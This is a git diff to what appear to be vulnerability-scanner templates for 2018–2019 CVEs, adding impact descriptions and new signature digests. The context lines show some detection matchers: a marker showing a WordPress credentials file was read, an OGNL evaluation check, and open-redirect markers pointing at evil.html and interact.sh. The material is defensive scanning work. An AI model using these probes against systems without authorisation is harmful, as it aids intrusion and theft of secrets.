\ No newline at end of file
+# digest: 4a0a00473045022100b526a2db39908b8f922291f89d4f421d66472f37ac7e927714d7f2f1c949ada1022004ceaf7478d0ee3d9a03b8cc8d32a3748621bfb36105c4789d19db9472793034:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-7467.yaml b/http/cves/2018/CVE-2018-7467.yaml
index 1f07a1092e..4dfcb25342 100644
--- a/http/cves/2018/CVE-2018-7467.yaml
+++ b/http/cves/2018/CVE-2018-7467.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: high
   description: AxxonSoft Axxon Next suffers from a local file inclusion vulnerability.
+  impact: |
+    An attacker can read sensitive files, execute arbitrary code, or launch further attacks.
   remediation: |
     Apply the latest security patches or updates provided by AxxonSoft to fix the local file inclusion vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
           - "fonts"
           - "extensions"
         condition: and
-# digest: 490a0046304402201e89317ffeab3a7da1e541c6a1953cd2f8f87d4698564435d1f7cf16228eac70022007242b5a85fd45f036021a3b695ed5e357025eca5043dbe2cf435b4426a69d21:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100faa25baaeb8464ddc5a08557bf4eb5805a33f03e69963ab203d07ca48df9c0f702201fcefd2b1cab52b8e9135724eb93e1c7f402e65c52f83244a79cfb51e708dd9c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-7490.yaml b/http/cves/2018/CVE-2018-7490.yaml
index 1fd8446bdf..315cb70465 100644
--- a/http/cves/2018/CVE-2018-7490.yaml
+++ b/http/cves/2018/CVE-2018-7490.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: high
   description: uWSGI PHP Plugin before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, making it susceptible to local file inclusion.
+  impact: |
+    An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Update to the latest version of uWSGI PHP Plugin or apply the necessary patches to fix the local file inclusion vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100cd5dca94d908ca095641533e70051d995235c326c5fe8976b1aad8e044f9dd100221008f16eec0c9a4b9d49203214d0f8cbb197960aa6a03d94966103f025e050e6e4c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008fa78753410e4643ec84c82fc44d20aed3928e0f930fbfe435623cc9713ca5bf022100906b786f0a345e2db362c6e93b891964b4a77bb64b5e80fbeeca7cc6e44a9d7b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-7600.yaml b/http/cves/2018/CVE-2018-7600.yaml
index 8ab5675efe..1131d5c68c 100644
--- a/http/cves/2018/CVE-2018-7600.yaml
+++ b/http/cves/2018/CVE-2018-7600.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
+  impact: |
+    Critical
   remediation: |
     Upgrade to the latest version of Drupal or apply the official patch provided by Drupal security team.
   reference:
@@ -72,4 +74,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f0d0f66d9c1abd82c931d1f0d20913b19023dc2a65d436c6b55f9fa4a03b8e6b02206c33d4e8892a811302c2a2f7cba8adea8be603a4293f3f770380dbf10e75e0a0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210089cef81d4f9ef778bb2881063a07056e05076574e02b82e49a39dd7a64ab751b0221009fff30df5a932332e7f5c7a24b413aa955ed1bea267598295f4dba293acd9c33:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-7602.yaml b/http/cves/2018/CVE-2018-7602.yaml
index b534884694..eb73186752 100644
--- a/http/cves/2018/CVE-2018-7602.yaml
+++ b/http/cves/2018/CVE-2018-7602.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: critical
   description: Drupal 7.x and 8.x contain a remote code execution vulnerability that exists within multiple subsystems. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.
+  impact: |
+    Remote attackers can execute arbitrary code on the affected Drupal installations.
   remediation: |
     Upgrade to Drupal 7.58, 8.3.9, 8.4.6, or 8.5.1 or apply the necessary patches provided by Drupal.
   reference:
@@ -82,4 +84,4 @@ http:
           - '<input type="hidden" name="form_build_id" value="(.*)" />'
         internal: true
         part: body
-# digest: 4a0a0047304502204063ae9a332ac45c4e3b904eec0117b834d71b40faca0c214768ac3ccbf8c278022100f4bee24bf54f6847d0f22384720c0dba953ef9f9daffe2452304e4f0679d2449:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ea2c31fd2a5b61bcde118f1d4f83056ab6c83f72c07a8922883f1dcf859f41be022100e4a8165c712c18a6cbc6adef262ef20b072850f10c2d4f678d4104d4e6af24b0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-7662.yaml b/http/cves/2018/CVE-2018-7662.yaml
index 9777d13d19..f8a9a3f35d 100644
--- a/http/cves/2018/CVE-2018-7662.yaml
+++ b/http/cves/2018/CVE-2018-7662.yaml
@@ -5,6 +5,8 @@ info:
   author: ritikchaddha
   severity: medium
   description: CouchCMS <= 2.0 allows remote attackers to discover the full path via a direct request to includes/mysql2i/mysql2i.func.php or addons/phpmailer/phpmailer.php.
+  impact: |
+    An attacker can exploit this vulnerability to gain knowledge of the server's directory structure, potentially aiding in further attacks.
   remediation: |
     Upgrade to the latest version of CouchCMS (2.1 or higher) to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
           - "phpmailer.php on line 10"
           - "Fatal error: Call to a menber function add_event_listener() on a non-object in"
         condition: and
-# digest: 4a0a0047304502200a70e1d75446d742cce75518460f3a484e73e293616c12bc936141ed3018cd90022100d4d2b723a4525d6be94899e2b3dde5a719b9100d6628b362c1935be0e4d34e61:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009e1ab8356c7c4b92a323c66fe6fdcd1ad09581c95c94d7990a7023f7f951437a022100a917fc623f1e20a813adef1fd9564bf25ad7dd7670c5c034311301e80c8bb7cd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-7700.yaml b/http/cves/2018/CVE-2018-7700.yaml
index df9b6e111d..80a19539e4 100644
--- a/http/cves/2018/CVE-2018-7700.yaml
+++ b/http/cves/2018/CVE-2018-7700.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     DedeCMS 5.7SP2 is susceptible to cross-site request forgery with a corresponding impact of arbitrary code execution because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code.
+  impact: |
+    Successful exploitation of these vulnerabilities can lead to unauthorized actions performed on behalf of the user and execution of arbitrary code.
   remediation: |
     Apply the latest security patches and update to a newer version of DedeCMS.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022072066feacae382b3cb8bf0a8cc6af69a0e56afb34e715cc9fd99d4cfaee9e7780221008291ec7d85ce05d04dfca4dcae8228d8da628365f653e42f5e970a5bdedf5722:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204428a40331192f89572ae49c3068c19673ddcbff83350a917b218898c76b68a0022100e9d0485e282893b2fe00bfa53a376a4a632ac60171580da263afaaa9917b4f2e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-7719.yaml b/http/cves/2018/CVE-2018-7719.yaml
index 381b89413d..bb6864a140 100644
--- a/http/cves/2018/CVE-2018-7719.yaml
+++ b/http/cves/2018/CVE-2018-7719.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Acrolinx Server prior to 5.2.5 suffers from a local file inclusion vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system.
   remediation: |
     Upgrade Acrolinx Server to version 5.2.5 or later to mitigate the vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
           - "fonts"
           - "extensions"
         condition: and
-# digest: 490a0046304402203e771e55aa9b8d8195bf4ed2f6e6a9c10e38014b710e25cf3251f63200ca16ba02204b670852c6a2fed849ee66373e85c57ec5829c8901cbcefcecf093c5b8c3cd50:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206dba6504f34e7844e1810d79f83a6f344882e014c321e3446ce9ffa269324c45022079b0d23b9376d0b14540cf8c51eac925f5b69761e8b9614b8ce8252df01935bc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-8006.yaml b/http/cves/2018/CVE-2018-8006.yaml
index e6a9c02e4f..a620724c0a 100644
--- a/http/cves/2018/CVE-2018-8006.yaml
+++ b/http/cves/2018/CVE-2018-8006.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: medium
   description: Apache ActiveMQ versions 5.0.0 to 5.15.5 are vulnerable to cross-site scripting via the web based administration console on the queue.jsp page. The root cause of this issue is improper data filtering of the QueueFilter parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade Apache ActiveMQ to a version higher than 5.15.5 or apply the necessary patches provided by the vendor.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100deea7b98f2fdc7035a89a24b3dd0e3b8647dc8410f1f6ccee756a197862f3ed4022100aa5532596d48a6998239512e1f4d1bed6b0a9a0006e803c07b6c62acdd077f7b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009f82e0da2505321e9ec5d0cf4618d3add2f2a2b2dbca2c58e5573a7052e93d8b0220532356f222c90dd593e8f80d8cc3ddb517ec7c2eb3e8b64bc8f596280b9f6c36:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-8033.yaml b/http/cves/2018/CVE-2018-8033.yaml
index da80c8f40c..9d54d17f68 100644
--- a/http/cves/2018/CVE-2018-8033.yaml
+++ b/http/cves/2018/CVE-2018-8033.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Apache OFBiz 16.11.04 is susceptible to XML external entity injection (XXE injection).
+  impact: |
+    Successful exploitation of this vulnerability could lead to information disclosure, denial of service.
   remediation: |
     Apply the necessary patches or upgrade to a non-vulnerable version of Apache OFBiz.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f3764a2290e4a13abb9804f62d630e5f5906df2ae6b6d1a26c0c806426ad428902204792258be3b547ce1839961217b21d9cb1a9401146e34c9bf347d61fdbaef5e6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203a0044ab25795c7c75ba9c4819507fdcc92289c32bfaa9c1342e3c6c56db1956022100e4158665971deb43376ce9ec7ac7fa795c820eb2a080bff590f3fba6e7f00769:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-8715.yaml b/http/cves/2018/CVE-2018-8715.yaml
index ff8c22e0f7..db6ae8f643 100644
--- a/http/cves/2018/CVE-2018-8715.yaml
+++ b/http/cves/2018/CVE-2018-8715.yaml
@@ -5,6 +5,8 @@ info:
   author: milo2012
   severity: high
   description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the application.
   remediation: |
     Apply the necessary patches or updates provided by the vendor to fix the authentication bypass vulnerability in AppWeb.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502201c9ac5b0072f9617a54629d8fa3f0933ec3a7b43a5223d5f539ac471db1fb594022100d500b1e96fa5d9e3bac77bd213820df570636ab4424dfa35092572ba2a0464cb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207969d2156181e77583725c4acc6b9ca8de7d058435d8c0f06677ce163a69c95302210093765018265160f0bd78501326c3038451f5d80f8db094f8f460ebd6a26dca80:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-8719.yaml b/http/cves/2018/CVE-2018-8719.yaml
index 0a181ca693..15090a4595 100644
--- a/http/cves/2018/CVE-2018-8719.yaml
+++ b/http/cves/2018/CVE-2018-8719.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress WP Security Audit Log 3.1.1 plugin is susceptible to information disclosure. Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information from the WordPress WP Security Audit Log plugin.
   remediation: |
     Update to the latest version of WordPress WP Security Audit Log plugin (3.1.2 or higher) to fix the information disclosure vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d5e2db3e830b171c73fae93df282d45b162f64b0498170b851be0a2681ed6495022047d7390087df1cee5bd0a3c391b14290b6c93127ff69824c0393ec25569ed053:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022056d82bf818fe9f28cd4837eb69fa093a27bdbb7554b8d48e77be721a02ee38eb022100b1133895d7ad4357ec6c86a70d46b86c1ffa916001f9b7398a37e08944df27bf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-8727.yaml b/http/cves/2018/CVE-2018-8727.yaml
index a8e1040f29..dd639ac9a9 100644
--- a/http/cves/2018/CVE-2018-8727.yaml
+++ b/http/cves/2018/CVE-2018-8727.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Mirasys DVMS Workstation versions 5.12.6 and prior suffer from local file inclusion vulnerabilities.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system.
   remediation: |
     Upgrade to a patched version of Mirasys DVMS Workstation (>=5.12.7) to mitigate the LFI vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
           - "fonts"
           - "extensions"
         condition: and
-# digest: 4a0a004730450220473af0f977158e1196bb31e4f7e7ed8d0e8547e3df7ee8036b75366098d5d86b022100fdb2e3d23b147216ba76247a8e3ff3ababe9d185bb2521453094b2e7494da5e8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100bc9bca8bc2968d6d89c8faeb1a0e24328b1a94355cdfe71e86d95b907ed7542f022100eb3e209f8bda6e2fa0b5152506b941fdadaebc64f674268ec7d7fc46297ee5bd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-8770.yaml b/http/cves/2018/CVE-2018-8770.yaml
index 038c955445..ff78a2c379 100644
--- a/http/cves/2018/CVE-2018-8770.yaml
+++ b/http/cves/2018/CVE-2018-8770.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: medium
   description: Cobub Razor 0.8.0 is susceptible to information disclosure via generate.php, controllers/getConfigTest.php, controllers/getUpdateTest.php, controllers/postclientdataTest.php, controllers/posterrorTest.php, controllers/posteventTest.php, controllers/posttagTest.php, controllers/postusinglogTest.php, fixtures/Controller_fixt.php, fixtures/Controller_fixt2.php, fixtures/view_fixt2.php, libs/ipTest.php, or models/commonDbfix.php. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information.
   remediation: |
     Upgrade to a patched version of Cobub Razor.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221008fab75c96832c264253907321d163e3454c2eea8c7c12a1c4264a9a4daf0e61d02205ea3654d93a0b297362dc131c7707c99d4cb3bbbf5f955bc1afd9148b39d546c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207cc4cb6b3c2807f9f24947ef0be7875826b47def354da4f5101432b1dcb13bc602205104cc410ad4c9b885de1d08560cd1161c58e3257227e196b6c86f2b48612277:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-9118.yaml b/http/cves/2018/CVE-2018-9118.yaml
index d24227b335..bc15a47160 100644
--- a/http/cves/2018/CVE-2018-9118.yaml
+++ b/http/cves/2018/CVE-2018-9118.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php.
+  impact: |
+    This vulnerability can lead to unauthorized access to sensitive files on the server, potentially exposing sensitive information or allowing for further exploitation.
   remediation: |
     Upgrade to 4.1.15.
   reference:
@@ -43,4 +45,4 @@ http:
           - "DB_HOST"
           - "The base configurations of the WordPress"
         condition: and
-# digest: 4b0a00483046022100a4bbe97b585e36ce3a84ea9b99d6e710acdf028a66eea49a36e1b8df04873801022100f18193dd05cd31266ac598cd458540ea52760dc97271db37650279dd8a2b59d8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a1ba5b6d636ab970dee2ceae084442c8af3049030f5d6921d8e30db2f8556bb5022100c559110c1ab8eb6d3a65e6f25fad8e9dbb6daab069231e2f9ca29026687f1b28:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-9161.yaml b/http/cves/2018/CVE-2018-9161.yaml
index 78efcde966..8752fb8d70 100644
--- a/http/cves/2018/CVE-2018-9161.yaml
+++ b/http/cves/2018/CVE-2018-9161.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script.
+  impact: |
+    An attacker could gain unauthorized access to the application and potentially compromise user accounts and sensitive data.
   remediation: |
     Ensure that sensitive credentials are properly protected and not exposed in the application's source code or configuration files.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022064056402a395eafb68395527f03b019744d5e561569f74e4fdee4545c80f529302200ff15d3c8ed3fbf8fb25f34202ee38a88aa876f58608cb393d9ae47ea7576607:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207991551f12c4121cd102e43feb461652749e263c2429ca53e676db6f795aa80902201b735b0f0ef547573a998b9dead0cf8e5254e07caeec430d1d1f31d7950a880f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-9845.yaml b/http/cves/2018/CVE-2018-9845.yaml
index a62db883aa..c1775e56b1 100644
--- a/http/cves/2018/CVE-2018-9845.yaml
+++ b/http/cves/2018/CVE-2018-9845.yaml
@@ -5,6 +5,8 @@ info:
   author: philippedelteil
   severity: critical
   description: Etherpad Lite before 1.6.4 is exploitable for admin access.
+  impact: |
+    An attacker can bypass the admin authentication and gain unauthorized access to the admin panel.
   remediation: |
     Upgrade to Etherpad Lite version 1.6.4 or later to fix the vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f9c89a6a51c1528e1b41934d85e6840016195cc1ff69081aa8b6c8503c14757d02200b1db7aa0ce4f629407b082634917431822a68ec44ed8bfce65f1e6fe4d3f674:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022015270cb686757ab14394d1f1541b04fd71aa0e080d59218746fef7e3ff2aa2f0022100cb95c8cdde70bf09e745a57771ad198b1e6cfeae2f3950454a257d5ae1d913da:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-9995.yaml b/http/cves/2018/CVE-2018-9995.yaml
index 860c504c73..58fac4665d 100644
--- a/http/cves/2018/CVE-2018-9995.yaml
+++ b/http/cves/2018/CVE-2018-9995.yaml
@@ -8,6 +8,8 @@ info:
     TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and
     MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass
     authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response.
+  impact: |
+    An attacker can bypass authentication and gain unauthorized access to the device, potentially leading to unauthorized configuration changes or data exfiltration.
   remediation: |
     Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability and ensure strong and unique passwords are used for device access.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402207e16ed641d135d28c0c7d2e7ad5e8b679377e18458cdd7b91aa4f7293421d52a022017ae58692caa029857a7a615f8569daf0b2df63244d5c903b4fc61c4bca25788:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ef440060fcdb298481cd20a8885814d87ed1862e316371d7ec58785d80d683c2022100ef8ac2bd6319ae1bfa2d89b630ea5a33b576d6b2b4dd6fd7ff0b6855b4bdd871:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-0193.yaml b/http/cves/2019/CVE-2019-0193.yaml
index 622ee45354..4acec11a92 100644
--- a/http/cves/2019/CVE-2019-0193.yaml
+++ b/http/cves/2019/CVE-2019-0193.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Apache Solr is vulnerable to remote code execution vulnerabilities via the DataImportHandler, an optional but popular module to pull in data from databases and other sources. The module has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk.
+  impact: |
+    Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary commands on the affected system.
   remediation: |
     Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
   reference:
@@ -62,4 +64,4 @@ http:
         regex:
           - '"name"\:"(.*?)"'
         internal: true
-# digest: 4b0a0048304602210087727e10191ba988c7c2e4c22126c5e67dac61b659e98fc06b630ce4037e6af5022100c8ebff027ab33ddb930aa925a035c0da72ab2bb1a7f441b03e885adc15433f95:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201ff4b8f294a9f799a43048678507e24ab3bdf138ca7129116cdac4499005eb6002200e21f1f8a4caeff9200dd674a83781521c681c13f2c635cfc54631db5fe5cc4e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-0221.yaml b/http/cves/2019/CVE-2019-0221.yaml
index 2780fb3737..4070490e52 100644
--- a/http/cves/2019/CVE-2019-0221.yaml
+++ b/http/cves/2019/CVE-2019-0221.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93 are vulnerable to cross-site scripting because the SSI printenv command echoes user provided data without escaping. Note: SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the necessary patches or updates provided by Apache Tomcat to fix the XSS vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100fa66e2935a62787d640ea27fbefd5129d1c0d26338835602608658a7e46267b00220752de1d5a6c8f81250696c3c81ba7afe15e505ded35641934808e34062230efc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200e6343ed23520e750318bacb010dfad8350785a63c6aec945e9c77406837ccfc022100b13898ec4c58138037b4519a4d709228912320197af5204e22d29fe0ef1f0eb7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-0230.yaml b/http/cves/2019/CVE-2019-0230.yaml
index f58722cd7a..9da37eb56b 100644
--- a/http/cves/2019/CVE-2019-0230.yaml
+++ b/http/cves/2019/CVE-2019-0230.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: critical
   description: Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation when evaluated on raw user input in tag attributes, which may lead to remote code execution.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected server.
   remediation: |
     Upgrade Apache Struts to a version higher than 2.5.20 or apply the necessary patches provided by the vendor.
   reference:
@@ -39,4 +41,4 @@ http:
         part: body
         words:
           - "{{str}}16384"
-# digest: 4b0a00483046022100f9e9315346810c3f65ec634d119845bdf49b38bdc4330f827a3a3505867a1b6f022100e96462975abacc89ca806856d8967ad6566705deaa141a9157b9cb4b4b5b41ba:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201b053aed153f3b85c41f9b2fbb5b125b073e4e66805a7ae6ca749ee23629b2940220132cf6803a09257d18a98efae36d73ec461c857dd17236a4d6cf157cc2a130c7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-10068.yaml b/http/cves/2019/CVE-2019-10068.yaml
index b9eeadbde4..a736620099 100644
--- a/http/cves/2019/CVE-2019-10068.yaml
+++ b/http/cves/2019/CVE-2019-10068.yaml
@@ -5,6 +5,8 @@ info:
   author: davidmckennirey
   severity: critical
   description: Kentico CMS is susceptible to remote code execution via a .NET deserialization vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability can result in remote code execution, allowing an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches and updates provided by Kentico CMS to mitigate this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 490a0046304402205a3d20c893d388ddf93d2c36dcbbe663538d44ade696606b4adc33369c04f924022053302d7b2f70131caf6e01e8fb61be3972831d9ef9128415c65ed54f594013f5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200cfb22aa03222f0c2b362c5ec5e459400d15d92084052d3c8dd616ed666624c902207cb00972301d2a878e601d8517af5d320e5dd3e155a57e457abe002046e81f75:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-10092.yaml b/http/cves/2019/CVE-2019-10092.yaml
index 64b01ee142..8cbefa0fdf 100644
--- a/http/cves/2019/CVE-2019-10092.yaml
+++ b/http/cves/2019/CVE-2019-10092.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: medium
   description: Apache HTTP Server versions 2.4.0 through 2.4.39 are vulnerable to a limited cross-site scripting issue affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious HTML code or execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to Apache HTTP Server version 2.4.40 or later, which includes a fix for this vulnerability.
   reference:
@@ -36,4 +38,4 @@ http:
       - type: word
         words:
           - "<a href=\"/\\google.com/evil.html\">"
-# digest: 490a00463044022045a89ba2d4df1cdaa3035c2a5a1969cf056a6ca66489ce521067df554f60627e0220075fb9478025353ee1d5b2a2b43a52eb66faae96a2cf055768f367aea0d08e8b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100de51931592309961896617abd608fd723f64911d4f219f5de28c040c8c2960d7022100f8d67330a2b865ce14e5fdc05a35c49d6146da3d94a38cf33e7041480c94c021:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-10098.yaml b/http/cves/2019/CVE-2019-10098.yaml
index 1b226aa96d..6695961088 100644
--- a/http/cves/2019/CVE-2019-10098.yaml
+++ b/http/cves/2019/CVE-2019-10098.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     In Apache HTTP server 2.4.0 to 2.4.39, Redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an unexpected URL within the request URL.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware.
   remediation: |
     Upgrade Apache HTTP server to version 2.4.40 or later to mitigate this vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
